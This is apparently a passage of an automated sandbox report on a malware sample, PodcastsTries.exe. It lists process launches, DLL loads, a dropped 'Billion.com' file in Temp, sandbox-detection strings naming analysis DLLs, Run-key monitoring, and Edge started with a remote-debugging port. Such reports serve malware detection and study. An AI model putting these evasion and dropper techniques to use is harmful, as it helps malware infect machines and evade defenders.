                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: PodcastsTries.exeStatic file information: File size 1259108 > 1048576
                Source: PodcastsTries.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: PodcastsTries.exeStatic PE information: real checksum: 0x1372e1 should be: 0x135a54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001802D8 push cs; retn 0017h12_2_00180318
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_00150DE6 push ecx; ret 12_2_00150DF9
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014DC7C push AA0018CFh; iretd 12_2_0014DC87

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\680662\Billion.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\680662\Billion.comJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_001C26DD
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0014FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_0014FC7C
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_12-103951
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comAPI coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7860Thread sleep count: 39 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\PodcastsTries.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019DC54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA087
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA1E2
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_0019E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0019E472
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.comCode function: 12_2_001AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_001AA570
